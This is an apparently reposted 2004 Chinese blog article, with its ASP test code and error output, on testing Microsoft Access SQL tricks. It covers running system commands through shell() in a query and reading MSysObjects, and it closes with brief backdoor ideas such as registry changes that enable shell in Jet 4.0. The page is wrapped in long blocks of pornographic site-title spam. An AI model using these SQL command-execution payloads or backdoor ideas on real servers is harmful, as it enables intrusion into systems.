亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 數據庫 > Access > 正文

Access的一些測試

2024-09-07 19:02:54
字體:
來源:轉載
供稿:網友

本文作者:SuperHei
文章性質:原創
發布日期:2004-09-16

我們先在accessl里直接sql查詢:

SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:123456.txt');


“運行”得到結果:

C:>dir 123456.txt
驅動器 C 中的卷沒有標簽。
卷的序列號是 3CEE-A8A9

C: 的目錄

2004-01-09 22:29 1,718 123456.txt
1 個文件 1,718 字節
0 個目錄 1,224,527,872 可用字節
C:>type 123456.txt
驅動器 C 中的卷沒有標簽。
卷的序列號是 3CEE-A8A9

c: 的目錄

2004-01-07 15:35 44 1.txt
2004-07-15 05:15 49 11.txt
2004-01-09 22:29 0 123456.txt
2004-07-31 15:50 478 333.txt

成功執行,我們看看權限,語句改為:

SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:3456.txt');

運行后:

C:>net user

KAK-E8UHOQQ9M6S 的用戶帳戶

----------------------------------------------
aa Administrator
IUSR_KAK-E8UHOQQ9M6S IWAM_KAK-E8UHOQQ9M6S
命令成功完成。

看來權限比較大(不過可能是繼承了運行access的用戶的權限,我用的是管理員權限運行的,對guest的沒有測試)

下面我們測試sp里執行,首先自己寫個asp,代碼如下:

< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "select shell('c:winntsystem32cmd.exe /c dir c: > d:sss1.txt')"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'關閉連接
conn.close
set conn=nothing
response.write "sql為:" &sql

%>

運行這個asp,返回結果如下:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 錯誤 '80040e14'

表達式中 'shell' 函數未定義。

/test/lse/Connections/kaoo6.asp,行7

提示” 'shell' 函數未定義”,測試失敗,我把asp代碼里的
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
改為 dsn="Provider=Microsoft.Jet.OLEDB.3.5;Data Source="&Server.MapPath("q.mdb")

運行ie返回:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

ADODB.Connection 錯誤 '800a0e7a'

Provider cannot be found. It may not be properly installed.

/test/lse/Connections/kaoo8.asp,行5

Provider沒有安裝 沒有繼續測試.

2.關于暴庫的測試

這里使用MsysObjecs : 我們新建立個查詢,語句如下:

SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate, SysObjects.Name, ysObjects.Type ROM MSysObjects;
MSysObjects.DateCreate 得到建立時間
MSysObjects.DateUpdate 更新時間
MSysObjects.Name 數據庫名稱
MSysObjects.Type 數據庫類型

我們執行上面的語句,直接得到結果:

我們放到asp里:

< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate,MSysObjects.Name,MSysObjects.Type FROM MSysObjects;"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'關閉連接
conn.close
set conn=nothing
response.write "sql為:" &sql

%>

ie返回:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 錯誤 '80040e09'

不能讀取記錄;在 'MSysObjects' 上沒有讀取數據權限。

/test/lse/Connections/kaoo7.asp,行7

提示 不能讀取記錄;在 'MSysObjects' 上沒有讀取數據權限。 沒辦法了,這個辦法又夭折拉.

3.補充:

在iis5(Microsoft.Jet.OLEDB.4.0)我們不可以直接執行shell(據說在Jet 3.5 也就是在iis4的時代可以),在Jet.OLEDB.4.0默認的情況下不可以,但是可以設置,我們可以通過改注冊表等來實現,具體的不知道.

后門思路:

1,就是上面的改注冊表,讓Jet.OLEDB.4.0支持shell 這樣我們可以在asp里直接利用.
2.我們通過其他程序,直接對mdb文件操作,利用select shell()執行系統命令.

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
国产精品尤物福利片在线观看| 在线观看欧美日韩国产| 亚洲视频视频在线| 久久久视频在线| 尤物精品国产第一福利三区| 国产成人在线一区二区| 亚洲色图综合网| 最近日韩中文字幕中文| 亚洲精品动漫100p| 日韩高清电影免费观看完整版| 亚洲人成网在线播放| 精品一区电影国产| 日韩激情第一页| 日韩精品在线观看视频| 欧美在线影院在线视频| 亚洲精品久久久久中文字幕二区| 亚洲一二三在线| 国产亚洲日本欧美韩国| www.色综合| 国产午夜精品免费一区二区三区| 在线一区二区日韩| 亚洲第一网站免费视频| 浅井舞香一区二区| 日本一区二三区好的精华液| 精品久久香蕉国产线看观看gif| 久久久免费精品视频| 夜夜嗨av一区二区三区四区| 一区二区日韩精品| 欧美激情视频网| 国产视频精品免费播放| 亚洲国产天堂久久综合网| 欧美人与物videos| 亚洲欧美一区二区三区情侣bbw| 国产日韩精品在线观看| 青草青草久热精品视频在线网站| 欧美性在线视频| 欧美精品videos另类日本| 成人午夜激情免费视频| 欧美视频一区二区三区…| 91国产精品91| 国产一区私人高清影院| 国产精品日韩欧美综合| 亚洲人成亚洲人成在线观看| 日韩成人xxxx| 亚洲丁香久久久| 97香蕉久久超级碰碰高清版| 亚洲女人被黑人巨大进入| 中文字幕亚洲欧美日韩在线不卡| 91精品国产99久久久久久| 92福利视频午夜1000合集在线观看| 91精品久久久久久久久青青| 日韩有码在线播放| 自拍偷拍亚洲在线| 欧美福利视频在线| 日韩久久免费视频| 97视频在线观看视频免费视频| 在线观看成人黄色| 亚洲tv在线观看| 欧美中文在线观看国产| 91网在线免费观看| 久久99久久99精品中文字幕| 91精品在线播放| 中文字幕av一区| 欧美视频国产精品| 日本中文字幕不卡免费| 成人免费福利在线| 国产精品久久久久免费a∨| 亚洲综合在线中文字幕| 日韩电影在线观看免费| 欧美成人在线免费视频| 国产精品视频中文字幕91| 91av在线播放视频| 亚洲精品99久久久久中文字幕| 美女啪啪无遮挡免费久久网站| 海角国产乱辈乱精品视频| 韩剧1988免费观看全集| 国产精品久久一| 91精品国产91久久| 亚洲自拍中文字幕| 菠萝蜜影院一区二区免费| 亚洲欧美一区二区三区久久| 亚洲免费影视第一页| 精品国产鲁一鲁一区二区张丽| 欧美激情免费看| 国产成人亚洲精品| 精品成人在线视频| 在线成人激情视频| 中文字幕在线看视频国产欧美在线看完整| 亚洲精选在线观看| 亚洲精品一区中文字幕乱码| 97国产精品免费视频| 操日韩av在线电影| 亚洲欧美国产制服动漫| 国产在线观看不卡| 91免费精品国偷自产在线| 一区二区三区视频免费在线观看| 欧美成人午夜视频| 97免费中文视频在线观看| 欧美日韩免费区域视频在线观看| 97国产精品人人爽人人做| 国产欧美在线播放| 91国产精品91| 亚洲一区二区三区四区在线播放| 岛国视频午夜一区免费在线观看| 国产精品电影一区| 久久久久久国产免费| 欧美美最猛性xxxxxx| 国产亚洲欧洲高清一区| 中文字幕在线观看日韩| 欧美壮男野外gaytube| 国产成人激情小视频| 美女国内精品自产拍在线播放| 日韩在线观看免费av| 国产精品在线看| 91系列在线观看| 精品久久久精品| 亚洲精品永久免费精品| 性色av一区二区三区| 亚洲精品美女网站| 国产精品自产拍在线观| 国产精品视频播放| 欧美日韩激情视频8区| 亚洲国产毛片完整版| 性亚洲最疯狂xxxx高清| 亚洲欧美综合v| 日韩高清电影免费观看完整版| 久久视频在线视频| 奇门遁甲1982国语版免费观看高清| 中文字幕日韩欧美在线视频| 97视频在线观看免费| 国产精品一区二区性色av| 欧美性猛交xxxx偷拍洗澡| 中文字幕一区二区精品| 欧美性生活大片免费观看网址| 日韩精品在线视频美女| 亚洲精品国产品国语在线| 亚洲字幕一区二区| 国产精品国产自产拍高清av水多| 97精品一区二区三区| 91欧美精品成人综合在线观看| 国产91av在线| 久久久久日韩精品久久久男男| 亚洲黄色www| 欧美日韩综合视频| 91香蕉嫩草神马影院在线观看| 日韩欧美一区二区三区久久| 亚洲国产天堂久久综合网| 中文字幕久久精品| 久久久久久12| 中文字幕亚洲欧美日韩2019| 国产啪精品视频| 国产亚洲一区二区精品| 国产精品亚洲综合天堂夜夜| 精品视频久久久| 日韩精品视频免费在线观看| 91精品国产91久久久久久最新| 成人性教育视频在线观看| 日韩一区二区三区在线播放| 国产精品网站大全| 美日韩丰满少妇在线观看| 欧美成人免费全部观看天天性色| 欧美一区三区三区高中清蜜桃| 日韩欧美大尺度| 国内外成人免费激情在线视频网站|